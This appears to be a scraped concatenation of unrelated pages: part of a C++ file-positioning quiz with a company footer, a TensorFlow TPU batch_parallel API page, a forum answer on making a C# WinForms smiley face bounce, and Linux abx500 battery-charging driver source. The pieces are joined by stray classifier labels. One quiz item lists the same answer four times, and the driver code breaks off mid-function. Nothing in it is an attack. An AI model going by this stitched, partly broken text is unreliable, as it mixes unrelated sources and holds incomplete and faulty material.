content
stringlengths 228
999k
| pred_label
stringclasses 1
value | pred_score
float64 0.5
1
|
---|---|---|
Блог /
Виджет калькулятора ТО для автомастерской Mercedes на Vue.js с бэкендом на Bitrix
Автор: Марк Мишко
23.07.2019
2941
Постановка задачи
Нужен калькулятор ТО. Пользователь выбирает конфигурацию своего автомобиля по параметрам:
• Тип автомобиля (легковой, внедорожник, минивэн) в виде кнопок;
• Модель в виде списка превью+название;
• Год выпуска выпадающий список;
• Тип кузова выпадающий список;
• Модификация выпадающий список.
После того, как выбор сделан, появляется шкала километража с отметками периодичности ТО. Для автомобилей с бензиновыми двигателями шаг 15 000 км, для дизелей: 10 000 км. Так же есть "крышка" — максимально допустимый пробег, на котором оказываются услуги по обслуживанию автомобиля. Она разная на разных модификациях.
Далее пользователь, выбрав свой пробег, получает ближайший бОльший пробег, на котором делают ТО. Например, если я проехал 16 000 километров, то мое ТО — 30 000 км. Теперь вся информация для расчета у нас есть, показываем цену, список производимых работ и кнопку "записаться", при клике на которую появляется модальник с формой. Информация летит в инфоблок Битрикса и на почту. Автосервис получает лид и очень счастлив. Клиент и так счастлив, у него же мерседес :)
Вся эта красотища нужна нам в виде виджета, который в три строчки вставляется в любое место любого сайта, т.к. помимо раздела "ТО" на основном сайте сервиса хочется использовать его на лендинге, заточенном под конкретную услугу ТО.
В админке должна быть возможность настраивать лэйблы полей и сообщение об успешной отправки, а также основной цвет.
Срок: 2 рабдня.
Как делать то? Реализация
Виджет значит. И чтоб цвет назначался. И лэйблы. И чтоб админилось все это. Ну ок, поехали:
Бэкенд: пишем битриксовый модуль, который нам спарсит 100500 моделей, модификаций, цен у официалов (парсер — это отдельная история). Храним всю информацию в инфоблоках. Их получается аж 8 штук:
1. Тип авто,
2. Модель,
3. Год выпуска,
4. Тип кузова,
5. Модификация,
6. Цены,
7. Работы,
8. Заявки.
Жить с официальными ценами не хочется, надо ими как-то управлять. Понятно, что вручную править 6500+ цен, это не только лишь долго, но и совсем. Решаем вопрос назначением коэффициентов для моделей и типов кузова.
Для общения с фронтом пишем небольшой php-класс, реализующий API.
Хорошо, с бэкендом понятно. Что с фронтом? Ежели виджет — надо подключать всего два файла: js-скрипт и файл стилей. Мы любим Vue.js, а он нас) Но хочется работать с полноценными компонентами в файлах .vue, использовать Sass, тестировать в изолированной среде и получать на выходе бандл из двух файлов. Выручает прекрасный vue-cli и замечательный webpack.
Структура файлов и директорий виджета
Вот она:
/widget/api/ — директория с API.
/widget/api/api.php — входная точка для запросов к API.
/widget/api/mmbApi.php — класс, реализующий работу с API.
/widget/mmb/ — фронтэнд. Собственно, сам виджет.
/widget/mmb/dist/ — сюда билдится продакшн-версия.
/widget/mmb/public/ — файлы для построения dev версии.
/widget/mmb/src/ — исходники.
/widget/mmb/src/components/Calc.vue — это Vue-компонент виджета.
/widget/mmb/src/App.vue — приложение Vue.
/widget/mmb/src/main.js — инициирующий файл.
/widget/mmb/vue.config.js — конфигурационный файл.
Вполне себе небольшая и понятная структура. Начнем рассмотрение с Back end:
Back end. API калькулятора.
Файл api.php, к которому мы обращаемся для взаимодействия из виджета, совсем небольшой.
Подключаем битриксовый пролог, класс для работы с апи и битриксовые модули каталога с инфоблоками:
<? require($_SERVER["DOCUMENT_ROOT"] . "/bitrix/modules/main/include/prolog_before.php");
include "mmbApi.php";
CModule::IncludeModule("catalog");
CModule::IncludeModule("iblock");
Затем чистим буфер, инициируем результирующий массив и получаем таск из запроса:
global $APPLICATION;
$APPLICATION->RestartBuffer();
$result = [];
$task = !empty($_REQUEST['task']) ? $_REQUEST['task'] : '';
Ну а дальше обработаем таски:
switch ($task) {
case 'get-data':
$api = new mmbApi();
$result = $api->getData();
break;
case 'get-sass-vars':
$api = new mmbApi();
$result = $api->getData();
$color = !empty($result['options']['field_main_color']) ? $result['options']['field_main_color'] : '#00ADEF';
$colorNoHex = str_replace('#', '', $color);
header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
header('Content-Type: text/css');
print_r("
.mmb-main-color-static,
#mmbApp .mmbc .mmb-price-price .mmb-price-value,
#mmbApp .mmbc .mmb-select-css:focus,
.mmb-main-color-static div {
color: $color !important;
}
#mmbApp .mmbc .mmb-modal__body,
#mmbApp .mmbc .mmb-reply {
border-color: $color !important;
}
.mmb-main-color-back-static,
#mmbApp .mmbc .mmb-works__text .service__item:after,
#mmbApp .mmbc .mmb-spinner > div,
.vue-slider-process,
#mmbApp .mmbc .mmb-btn {
background-color: $color !important;
}
.mmb-main-color-hover:hover,
.mmb-main-color-hover:hover div {
color: $color !important;
}
.mmb-main-color-back-hover:hover {
background-color: $color !important;
}
#mmbApp .mmbc .mmb-select-css,
#mmbApp .mmbc .mmb-works .mmb-title span:after {
background-image: url('data:image/svg+xml;charset=US-ASCII,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22292.4%22%20height%3D%22292.4%22%3E%3Cpath%20fill%3D%22%23$colorNoHex%22%20d%3D%22M287%2069.4a17.6%2017.6%200%200%200-13-5.4H18.4c-5%200-9.3%201.8-12.9%205.4A17.6%2017.6%200%200%200%200%2082.2c0%205%201.8%209.3%205.4%2012.9l128%20127.9c3.6%203.6%207.8%205.4%2012.8%205.4s9.2-1.8%2012.8-5.4L287%2095c3.5-3.5%205.4-7.8%205.4-12.8%200-5-1.9-9.2-5.5-12.8z%22%2F%3E%3C%2Fsvg%3E') !important;
}
");
exit;
break;
}
Их у нас два.
• get-data выдает данные для построения интерфейса виджета;
• get-sass-vars выдает захардкоденый кусок стилей, которые отвечают за оформление интерфейса, по сути, реализуя цветовую схему. Она, как мы помним, задается в настройках битриксового модуля путем указания главного цвета.
Переходим к нашему классу. А точнее, к методу getData:
public function getData()
{
$return = [];
// типы авто
$return += $this->cartypes();
// модели
$return += $this->models();
// года выпуска
$return += $this->years();
// типы кузова
$return += $this->bodytypes();
// модификации
$return += $this->modifications();
// текущая модификация
$return += $this->modification();
// отправка заявки
$return += $this->callback();
// настройки
$return += $this->options();
// запрос
$return += $this->request();
return $return;
}
Все просто и очевидно. Мы собираем данные по определенным сущностям и выдаем результирующий массив. Методы на получение данных из базы идентичны. Рассмотрим на примере modifications:
public function modifications()
{
$return = [];
if ($this->request['bodytype'] > 0) {
$modifications = $this->getElements([
'IBLOCK_ID' => self::IBLOCK_ID_MODIFICATION,
'PROPERTY_' . self::PROPERTY_CODE_CARTYPE_IN_MODEL => $this->request['cartype'],
'PROPERTY_' . self::PROPERTY_CODE_YEAR_IN_MODIFICATION => $this->request['year'],
'PROPERTY_' . self::PROPERTY_CODE_BODYTYPE_IN_MODIFICATION => $this->request['bodytype'],
], 100, [
'ID', 'IBLOCK_ID', 'PROPERTY_STEP', 'PROPERTY_MAX', 'NAME'
], ['SORT' => 'ASC'], false);
foreach ($modifications as $modification) {
$return[] = array(
'id' => $modification['fields']['ID'],
'name' => $modification['fields']['NAME'],
'step' => $modification['fields']['PROPERTY_STEP_VALUE'],
'max' => $modification['fields']['PROPERTY_MAX_VALUE'],
);
}
}
return ['modifications' => $return];
}
Модификации мы можем получить только если знаем тип автомобиля, год выпуска и тип кузова. Используем вспомогательный метод getElements(), который служит оберткой над CIBlockElement::GetList и выдает массив элементов.
Функция callback() занимается отправкой заявки в инфоблок и на емэйл:
public function callback()
{
$result = [];
if (!empty($this->request['callback'])) {
$PROP = [
'phone' => htmlspecialchars($this->request['callback_phone']),
'email' => htmlspecialchars($this->request['callback_email']),
];
$text = $this->request['callback_model'] . "\n";
$text .= $this->request['callback_year'] . "\n";
$text .= $this->request['callback_bodytype'] . "\n";
$text .= $this->request['callback_modification'] . "\n";
$text .= $this->request['callback_service'] . "\n";
$text .= $this->request['callback_price'] . "\n\n";
$text .= htmlspecialchars($this->request['callback_text']);
$itemToDb = [
"IBLOCK_SECTION_ID" => false,
"IBLOCK_ID" => self::IBLOCK_ID_CALLBACKS,
"NAME" => htmlspecialchars($this->request['callback_name']),
"PREVIEW_TEXT" => $text,
"ACTIVE" => "N",
"PROPERTY_VALUES" => $PROP
];
$el = new CIBlockElement;
$ID = $el->Add($itemToDb);
$el->SetPropertyValuesEx($ID, self::IBLOCK_ID_CALLBACKS, $PROP);
$elem = self::getElements(['IBLOCK_ID' => 37, 'ID' => $ID]);
$elem = array_values($elem)[0];
// добавление сообщения
$mName = $elem['fields']['NAME'];
$mText = $elem['fields']['~PREVIEW_TEXT'];
$mPhone = $elem['props']['phone']['VALUE'];
$mEmail = $elem['props']['email']['VALUE'];
// отправка письма с заказом админу
$emailFields = [
'mName' => $mName,
'mText' => $mText,
'mPhone' => $mPhone,
'mEmail' => $mEmail,
];
CEvent::Send('APP_CALC_MESSAGE', SITE_ID, $emailFields);
$result = ['reply' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_thx")];
$this->request['callback'] = 0;
}
return $result;
}
и делаем мы все это в случае, если заявка пришла из калькулятора. Признак: существование request['callback'].
В настройках модуля задаются лэйблы заголовков, подзаголовков и кнопок. Передаем их с помощью метода options():
public function options()
{
return [
'options' => [
'field_h_main' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_main"),
'field_h_auto' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_auto"),
'field_h_params' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_params"),
'field_h_works' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_works"),
'field_h_mileage' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_mileage"),
'field_h_mileage2' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_mileage2"),
'field_h_service' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_service"),
'field_h_price' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_price"),
'field_h_text' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_text"),
'field_h_name' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_name"),
'field_h_adds' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_adds"),
'field_h_thx' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_thx"),
'field_main_color' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_main_color"),
]
];
}
Front End.
Создаем проект с помощью vue-cli:
vue create mmb
Переходим в новый проект, выполняем
npm run build
смотрим директорию dist/js. Там сейчас несколько файлов вида:
app.95c13c5a.js
chunk-vendors.2ce01813.js
То есть мы только инициировали новое приложение, а файлов уже два. Начнем расти: файлов будет еще больше. И еще, каждый раз, когда мы делаем build, названия файлов разные. А что если код виджета уже установлен в нескольких местах на нескольких сайтах? Не будем же мы постоянно менять код вставки виджета во всех местах его присутствия. И так, мы хотим, чтобы .js файл был один и его название было статичным. То же касается и .css файла. Как это сделать?
Для этого в файле vue.config.js прописываем инструкции:
const webpack = require('webpack')
let assetsDir = "assets";
module.exports = {
assetsDir: assetsDir,
configureWebpack: {
output: {
filename: assetsDir + "/[name].js",
chunkFilename: assetsDir + "/[name].js"
},
plugins: [
new webpack.optimize.LimitChunkCountPlugin({
maxChunks: 1
})
]
},
chainWebpack:
config => {
config.optimization.delete('splitChunks')
if (config.plugins.has("extract-css")) {
const extractCSSPlugin = config.plugin("extract-css");
extractCSSPlugin &&
extractCSSPlugin.tap(() => [
{
filename: assetsDir + "/[name].css",
chunkFilename: assetsDir + "/[name].css"
}
]);
}
}
}
Замечательно. Теперь при сборке в /dist/assets/ получаем два файла:
app.css
app.js
Переходим непосредственно к написанию компонента. Виджет небольшой, поэтому решено обойтись одним компонентом и не дробить на несколько мелких. Создаем файл Calc.vue, где и будет вся движуха.
В секции <template> начинаем построение компонента с вывода главного заголовка. Мы помним, что текст заголовка хранится в админке и выдается нашим API.
<div class="mmb-title mmb-title_big">
<span v-if="info && info.options">{{info.options.field_h_main}}</span>
</div>
Директивой v-if проверяем, пришла ли информация от API. Если их есть у нас, выводим. Аналогично мы поступаем со всеми текстовыми настройками, которые задаются в админке.
Далее начинаем выводить функциональные блоки. Первым идет выборка типа автомобиля:
<div v-if="info && info.cartypes" class="mmb-cartypes">
<div v-for="cartype in info.cartypes" :key="cartype.id" class="mmb-cartype mmb-main-color-back-hover"
@click="handleCartypeChecked(cartype.id)"
:class="{'active mmb-main-color-back-static': (info.request.cartype == cartype.id)}">
{{cartype.name}}
</div>
</div>
Проходим в цикле по типам и выводим кнопки. По событию click навешиваем хэндлер, по которому мы должны обновить информацию из API. Код хэндлера расположен в секции <script> опции methods нашего компонента:
handleCartypeChecked(cartypeId) {
this.info.request.cartype = cartypeId;
this.info.request.model = 0;
this.info.request.year = 0;
this.info.request.bodytype = 0;
this.info.request.modification = 0;
this.getData(this.info.request);
},
Здесь мы кладем в request выбранный тип автомобиля и скидываем в ноль выбор модели, года, типа кузова и модификации, если таковые уже были выбраны. Затем обращаемся к API с помощью функции getData(). Эта функция является единственным "шлюзом", через который происходит все общение с API. И вот как она выглядит:
getData(params, scrollToElement) {
params = params || {};
scrollToElement = scrollToElement || '';
let that = this;
document.getElementById('mmb-spinner').classList.add("show");
axios
.get('https://mastermb.ru/widget/api/api.php?task=get-data', {params: params})
.then(response => (this.info = response.data))
.then(function () {
if (scrollToElement != '') {
that.resetScrollPos(scrollToElement);
}
document.getElementById('mmb-spinner').classList.remove("show");
});
}
Метод принимает два параметра:
1. params — параметра запроса;
2. scrollToElement — селектор элемента, к которому нужно промотать окно браузера после получения данных из API.
Ход выполнения следующий:
1. "Перекладываем" this в that, чтобы можно было использовать объект компонента в коллбэках;
2. Показываем индикатор загрузки;
3. Выполняем запрос к API;
4. Обновляем информацию;
5. Если нужно скроллить к элементу, делаем это с помощью специального метода that.resetScrollPos;
6. Прячем индикатор загрузки.
Далее идут блоки выбора модели, года выпуска, типа кузова и модификации:
<div v-if="info && info.models" class="mmb-models">
<div v-for="model in info.models" :key="model.id" class="mmb-model mmb-main-color-hover"
@click="handleModelChecked(model.id)"
:class="{'active mmb-main-color-static': (info.request.model == model.id)}">
<div class="mmb-model__preview">
<img :src="model.preview"/>
</div>
<div class="mmb-model__title">
{{model.name}}
</div>
</div>
</div>
<div v-if="info && info.request.model > 0" class="mmb-params" id="mmb-params">
<div class="mmb-params__params">
<div class="mmb-title mmb-title_w100">
<span v-if="info && info.options">{{info.options.field_h_params}}</span>
</div>
<div v-if="info && info.years && info.years.length" class="mmb-years">
<select v-model="info.request.year" @change="handleYearChecked($event)" class="mmb-select-css">
<option value="0">--= год ==-</option>
<option v-for="year in info.years" :key="year.id" :value="year.id">
{{year.name}}
</option>
</select>
</div>
<div v-if="info && info.bodytypes && info.bodytypes.length" class="mmb-bodytypes">
<select v-model="info.request.bodytype" @change="handleBodytypeChecked($event)"
class="mmb-select-css">
<option value="0">--= тип кузова ==-</option>
<option v-for="bodytype in info.bodytypes" :key="bodytype.id" :value="bodytype.id">
{{bodytype.name}}
</option>
</select>
</div>
<div v-if="info && info.modifications && info.modifications.length" class="mmb-modifications">
<select v-model="info.request.modification" @change="handleModificationChecked($event)"
class="mmb-select-css">
<option value="0">--= модификация ==-</option>
<option v-for="modification in info.modifications" :key="modification.id"
:value="modification.id">
{{modification.name}}
</option>
</select>
</div>
</div>
<div class="mmb-params__preview">
<div v-if="info && info.request.modification > 0">
<div class="mmb-model__preview">
<img :src="info.modification.preview"/>
</div>
</div>
<div v-if="info && info.request.modification == 0">
<div v-for="model in info.models" :key="model.id">
<div class="mmb-model__preview" v-if="info.request.model == model.id">
<img :src="model.preview"/>
</div>
</div>
</div>
</div>
</div>
Модели у нас в виде тизера "картинка + название". Год, кузов и модификация — select'ы. Как только последний из селектов выбран, можем переходить к показу цен и выборке пробега.
<div v-if="info && info.modification.length != 0">
<div class="mmb-works" :class="{'mmb-togglable-closed': worksClosed, 'mmb-togglable-opened': !worksClosed}">
<div class="mmb-title" @click="handleWorksToggle()">
<span v-if="info && info.options">{{info.options.field_h_works}}</span>
</div>
<div class="mmb-works__text">
<div class="mmb-works__text__inner" v-html="serviceWorks"></div>
</div>
</div>
<div class="mmb-title">
<span v-if="info && info.options">{{info.options.field_h_mileage}}</span>
</div>
<div class="mmb-mileage">
<vue-slider
v-model="sliderValue"
:marks="sliderData"
:contained="true"
:min="0"
:max="parseInt(info.modification.max)"
:interval="1000"
:railStyle="{height: '10px', 'border-radius': 0}"
></vue-slider>
</div>
<div class="mmb-price-box">
<div class="mmb-price-mileage">
<div class="mmb-price-header">
<span v-if="info && info.options">{{info.options.field_h_mileage2}}</span>
</div>
<div class="mmb-price-value">{{ formatNumber(sliderValue) }} км</div>
</div>
<div class="mmb-price-service">
<div class="mmb-price-header">
<span v-if="info && info.options">{{info.options.field_h_service}}</span>
</div>
<div class="mmb-price-value">{{ formatNumber(serviceVal) }} км</div>
</div>
<div class="mmb-price-price">
<div class="mmb-price-header">
<span v-if="info && info.options">{{info.options.field_h_price}}</span>
</div>
<div class="mmb-price-value">{{ servicePrice }} *</div>
</div>
<div>
<button class="mmb-btn" @click="modalShow()">Записаться</button>
</div>
</div>
<div class="mmb-annotation mmb-text-gray">
<span v-if="info && info.options">{{info.options.field_h_text}}</span>
</div>
...
</div>
Пробег удобно выбирать с помощью слайдера. Для этого используем <vue-slider>. Текущая цена является вычисляемым полем. Задаем ее в блоке computed:
servicePrice: function () {
var price = 0;
if (this.info && this.info.modification.length != 0) {
let currentService = this.serviceVal;
this.info.prices.forEach(function (element) {
if (parseInt(element.mileage) == currentService) {
price = element.price;
}
});
}
price *= parseFloat(this.currentModel.k);
price *= parseFloat(this.currentBodytype.k);
if (price == 0) {
price = 'По запросу';
} else {
price = this.formatNumber(price) + ' ₽';
}
return price;
}
Оставляем возможность вывода цены "по запросу", указывая в админке ноль.
Ну и обычная лидовая форма в модальнике.
Код установки виджета
Для вставки виджета будем использовать код:
<div id="mmbApp"></div>
<script>
(function (w, d, u, u2) {
var s = d.createElement('script');
s.async = true;
s.src = u + '?' + (Date.now() / 60000 | 0);
var h = d.getElementsByTagName('script')[0];
h.parentNode.insertBefore(s, h);
var s2 = d.createElement('link');
s2.href = u2 + '?' + (Date.now() / 60000 | 0);
s2.rel = 'stylesheet';
s2.type = 'text/css';
var h2 = d.getElementsByTagName('link')[0];
h2.parentNode.insertBefore(s2, h2);
})(window, document, 'https://mastermb.ru/widget/mmb/dist/assets/app.js', 'https://mastermb.ru/widget/mmb/dist/assets/app.css');
</script>
Почему бы просто не разместить обычные теги <script> и <link>? Все дело в кешировании. В случае со статичными урлами .js и .css файлов, при внесении изменений в работу виджета, мы не сможем гарантировать мгновенное применение этих изменений. Файлы будут закешированы на клиенте. Получится, что "старый" код виджета будет работать с "новым" API кодом. И хорошо если в API изменений нет. В противном случае случай будет противным)
А с помощью данного кода мы создаем все те же теги <script> и <link>, но уже средствами JavaScript. Зачем? Чтобы добавить к урлам наших файлов переменную величину в виде даты. Таким образом виджет всегда будет оставаться свеженьким.
Сам проект, где можно увидеть виджет: mastermb.ru
На этом все! Ставьте лайки, делайте репосты, рекомендуйте нас друзьям!
Остались вопросы? Пишите!
Здесь вы можете предложить тему для следующих статей
Заказать разработку
|
__label__pos
| 0.581038 |
Berechnung des Trägheitsmomentes eines Polygons
Geschrieben von am .
Das Trägheitsmoment wird berechnet als Integral über die Dichte multipliziert mit dem Quadrat der Entfernung von der Rotationsachse:
⟪ I = int_V vec r_(_|_)^2 rho(vec r) dV ⟫
Wir betrachten eine Fläche mit der konstanten Flächendichte ⟪1⟫. Damit vereinfacht sich die Formel zu:
⟪ I = int_A vec r_(_|_)^2 dA ⟫
Als Teilaufgabe betrachten wir ein Trapez, dessen eine Achse mit der X-Achse übereinstimmt und dessen zwei weitere Achsen parallel zur Y-Achse sind. Das Trapez ist durch die zwei Punkte ⟪(x_1, y_1)⟫ und ⟪(x_2, y_2)⟫ festgelegt:
··+ y₂
······ |
····· |
····· |
····· |
y₁ +·· |
| |
| |
| |
| |
| |
0 -+-------------------------+-
x₁ x₂
Das Trapez wird beschrieben durch:
⟪ f(x) = y_1 + (x-x_1) * (y_2-y_1) / (x_2-x_1) ⟫
Mit ⟪ Delta x := x_2-x_1 ⟫ und ⟪ Delta y := y_2-y_1 ⟫ und s := ⟪ Delta y // Delta x ⟫ ergibt sich:
⟪ f(x) = y_1 + s * (x-x_1) ⟫
Das Trägheitsmoment dieser Fläche berechnet sich zu:
⟪ I_i = int_(x=x_1)^(x_2) int_(y=0)^(f(x)) y^2 dy dx ⟫
⟪ I_i = int_(x=x_1)^(x_2) 1/3*[y^3]_(y=0)^(f(x)) dx ⟫
⟪ I_i = 1/3 * int_(x=x_1)^(x_2) f(x)^3 dx ⟫
Wir substituieren ⟪ x ⟫ für ⟪ x+x_1 ⟫:
⟪ I_i = 1/3 * int_(x=0)^(x_2-x_1) f(x+x_1)^3 dx ⟫
⟪ I_i = 1/3 * int_(x=0)^(Delta x) (y_1 + s*x)^3 dx ⟫
⟪ I_i = 1/3 * int_(x=0)^(Delta x) ( y_1^3 + 3*y_1^2*s*x + 3*y_1*s^2*x^2 + s^3*x^3 ) dx ⟫
⟪ I_i = 1/3 * [ int_(x=0)^(Delta x) y_1^3 dx + int_(x=0)^(Delta x) 3 * y_1^2 * s * x dx + int_(x=0)^(Delta x) 3 * y_1 * s^2 * x^2 dx + int_(x=0)^(Delta x) s^3 * x^3 dx ] ⟫
⟪ I_i = 1/3 * [ y_1^3 * Deltax + 3 * y_1^2 * s * 1/2 * Deltax^2 + 3 * y_1 * s^2 * 1/3 * Deltax^3 + s^3 * 1/4 * Deltax^4 ] ⟫
⟪ I_i = 1/12 * Deltax * [ 4 * y_1^3 + 6 * y_1^2 * s * Deltax + 4 * y_1 * s^2 * Deltax^2 + s^3 * Deltax^3 ] ⟫
⟪ I_i = 1/12 * Deltax * [ 4 * y_1^3 + 6 * y_1^2 * Deltay + 4 * y_1 * Deltay^2 + Deltay^3 ] ⟫
⟪ I_i = 1/12 * Deltax * [ 4 * y_1^3 + 6 * y_1^2 * (y_2-y_1) + 4 * y_1 * (y_2-y_1)^2 + (y_2-y_1)^3 ] ⟫
⟪ I_i = 1/12 * Deltax * [ 4 * y_1^3 +6 * y_2*y_1^2 -6 * y_1^3 4 * y_2^2y_1 -8 * y_2*y_1^2 +4 * y_1^3 + y_2^3 -3 * y_2^2y_1 +3 * y_2*y_1^2 - y_1^3 ] ⟫
⟪ I_i = 1/12 * Deltax * [ y_2^3 + y_2^2y_1 + y_2*y_1^2 + y_1^3 ] ⟫
⟪ I_i = 1/12 * Deltax * ( y_2^2 + y_1^2 ) * (y_2 + y_1) ⟫
Wir drehen das Vorzeichen von ⟪ Deltax ⟫, damit bei einem Polygon mit positiver Fläche (entgegen dem Uhrzeigersinn) auch das Trägheitsmoment positiv ist:
⟪ R_i = 1/12 (x_1-x_2) * ( y_2^2 + y_1^2 ) * (y_2 + y_1) ⟫
Und summieren über alle Teilflächen (⟪ y_n := y_0 ", " x_n := x_0 ⟫):
⟪ I = sum_(i=0)^(n-1) I_i = 1/12 sum_(i=0)^(n-1) (x_i-x_(i+1)) * ( y_(i+1)^2 + y_i^2 ) * (y_(i+1) + y_i) \ \ square ⟫
Wegen ⟪ AA g sum_(i=0)^(n-1) g(x_i, y_i) = sum_(i=0)^(n-1) g(x_(i+1), y_(i+1)) ⟫ lässt sich dies auch schreiben als:
⟪ I = sum_(i=0)^(n-1) I_i = 1/12 sum_(i=0)^(n-1) (x_iy_(i+1)-x_(i+1)y_i) * ( y_(i+1)^2 + y_(i+1)y_i + y_i^2 ) \ \ square ⟫
|
__label__pos
| 1 |
See where two ellipses intersect in C#, Part 2
See where two ellipses intersect
This post shows The Ugly Math that you can use to see where two ellipses intersect. Brace yourself! Here it comes!
First recall the quadratic formula. If ax2 + bx + c = 0, then:
Now consider the formula for a conic section:
You can rewrite this to group terms of x like this:
Plugging the terms into the quadratic formula gives the following equation, which we’ll call G1(y):
(Starting to get messy, isn’t it?)
Notice that the equation contains a square root that can be positive or negative. Let be the equation with the positive root and let be the equation with the negative root.
Now consider a second conic section defined by:
The equation for this conic section is:
Again define two equations and to represent this equation with the positive and negative square roots.
The two curves intersect where they have the same x and y values. In other words, those points have x coordinates where G1(x) = G2(x) or G1(x) – G2(x) = 0.
Considering all four combinations of positive and negative roots in the equations gives these four equations:
If you solve these four equations for x, you’ll find 0, 1, 2, or 4 points of intersections for the ellipses.
Note that some of the equations may contain square roots of negative numbers and in those cases they don’t have real solutions.
Note also that one of the equations might have more than one root. For example, in the picture on the right, the bottom of the red ellipse overlaps the top of the blue ellipse. If the red ellipse is ellipse number 1, then the bottom of the red ellipse is generated by equation
and the top of the blue ellipse is generated by equation . That means both points of intersection are generated by the equation .
Unfortunately the four equations that define the points of intersection are really messy. For example, equation (1) is:
I don’t know of a closed-form solution to this equation, but all is not lost! You can use Newton’s method to find an approximation for the values of x that solve the equation.
To use Newton’s method to find the roots (zeros) of an equation, you need to find the derivative of that equation. The derivative of G1(x) is given by:
The derivative of the difference of two functions is the difference of the derivatives. For example, the following equation shows the derivative of equation (1).
Now you can use equations (1) through (4) and their derivatives to apply Newton’s method and look for roots.
Simple isn’t it? Well… not really. See the post Use Newton’s method to find the roots of equations in C# for information about Newton’s method.
In the next post, I’ll summarize this method for finding intersections between conic sections and explain what the program shown in the picture at the top of this post actually does.
This entry was posted in algorithms, geometry, mathematics and tagged , , , , , , , , , , . Bookmark the permalink.
One Response to See where two ellipses intersect in C#, Part 2
1. Pingback: Draw a conic section from its polynomial equation in C# -
Leave a Reply
Your email address will not be published. Required fields are marked *
This site uses Akismet to reduce spam. Learn how your comment data is processed.
|
__label__pos
| 0.9524 |
The host in ApolloServer context is not real
The host entered by the user cannot be obtained in the context of ApolloServer
It is possible in WebApp.connectHandlers.use. How can I get the same value in the context of ApolloServer?
This is my code, Get the host in the Context of ApolloServer and get the result: localhost:4000
const server = new ApolloServer({
schema,
context: async ctx => {
console.log('Apollo server context: ', ctx.req.headers.host);
//Apollo server context: localhost:4000
},
});
server.applyMiddleware({
app: WebApp.connectHandlers,
path: '/graphql',
});
WebApp.connectHandlers.use('/graphql', (req, res) => {
if (req.method === 'GET') {
res.end();
}
});
The host result obtained in WebApp.connectHandlers.use is the entered hostname, such as hello.com
WebApp.connectHandlers.use((req, res, next) => {
if (req.headers && req.headers.host) {
console.log('WebApp connectHandlers: ', req.headers.host);
//WebApp connectHandlers: hello.com
}
return next();
});
What do I have to do to get hello.com in the context of ApolloServer? Please help me, thank you
The origin and referer cannot be retrieved from the context of ApolloServer. Is there any way
I asked this question in issuess of apollographql/apollo-server #4887
|
__label__pos
| 0.999864 |
DeepStream 3D Custom Manual
New ds3d framework, interfaces and custom-libs are defined for DS 3D processing. These interfaces are capble of different types of data fusion and can implement different types of custom libraries for dataloader, datafilter and datarender. The interface has ABI compatible layers and modern C++ interface layers. You’ll only need to focus on the modern interface for application or custom lib development.
DeepStream 3D dataloader is loaded by GstAppSrc. It could be used for depth camera such as stereo cameras, Time-of-Flight cameras to capture image/depth data or 2D/3D data-load from the source file., It also could be used for lidar data sensor or lidar data file capture. datafilter is loaded by the nvds3dfilter Gst-plugin. It could be used for 2D depth data processing , 3D point-cloud data extraction from depth, other 2D-depth or 3D-points data filters and lidar or 3D data inference. datarender is loaded by GstAppSink. It could be used for 2D depth rendering and 3D point-cloud and lidar data rendering. It also could be used for file dump.
DS3D Application Examples
• deepstream-lidar-inference has the sample code to load these custom libs and to connect these components together in simple ways. Besides that, DS3D has a simple C++ safe pointer for Gstreamer components. The interfaces are found in header files located at /opt/nvidia/deepstream/deepstream/sources/libs/ds3d/gst/.
The image below shows the overview of lidar 3D data inference and rendering pipeline in deepstream-lidar-inference.
DeepStream Lidar point cloud inference and rendering overview
See more details in the DeepStream Lidar Inference App (Alpha).
• deepstream-3d-depth-camera is another example for ds3d pipepline.
The image below shows the overview of depth to 3D point processing pipeline in deepstream-3d-depth-camera.
DeepStream Depth Camera for 3D point cloud processing overview
See more details in the DeepStream 3D Depth Camera App.
All the components are configured in YAML format. They are loaded by Gst-plugins.There are 3 major components, they may all be loaded into the deepstream pipeline.
ds3d::dataloader - Load Custom Lib for Data Capture
Load and Manage Dataloader
Examples:
name: realsense_dataloader
type: ds3d::dataloader
out_caps: ds3d/datamap
custom_lib_path: libnvds_3d_dataloader_realsense.so
custom_create_function: createRealsenseDataloader
config_body:
streams: [color, depth]
A custom dataloader must have type: ds3d::dataloader. It is created by explicit call of NvDs3D_CreateDataLoaderSrc(srcConfig, loaderSrc, start) with the full compoment YAML content. During this call, the custom_lib_path is loaded and a specific data loader is created via custom_create_function. A GstAppsrc object is also created into loaderSrc.gstElement.
GstAppsrc manages the ds3d::dataloader dataflows. This ds3d::dataloader component could be started automatically by gst-pipeline or manually by the application call.
GuardDataLoader dataloader = loaderSrc.customProcessor;
ErrCode c = dataloader.start();
To stop the dataloader, user can set GstAppsrc states to GST_STATE_READY or stop it manually.
GuardDataLoader dataloader = loaderSrc.customProcessor;
ErrCode c = dataloader.stop();
Dataloader in User Application
Examples:
#include <ds3d/common/hpp/dataloader.hpp>
GuardDataLoader dataLoader;
dataLoader.reset(createTestTimeDataloader()); # create a specific ABI
ErrCode c = dataloader.setErrorCallback([](ErrCode c, const char*){});
c = dataloader.start(yamlconfig); // check result.
while(isGood(c)) {
GuardDataMap data;
c = dataloader.readData(data);
// process data
}
c = dataloader.flush();
c = dataloader.stop();
GuardDataLoader provides safe access to abiDataLoader. Once it’s created, it will maintain the reference pointer to the dataloader.
Implement a Custom Dataloader
Examples:
#include <ds3d/common/impl/impl_dataloader.h>
class TestTimeDataLoader : public ds3d::impl::SyncImplDataLoader {
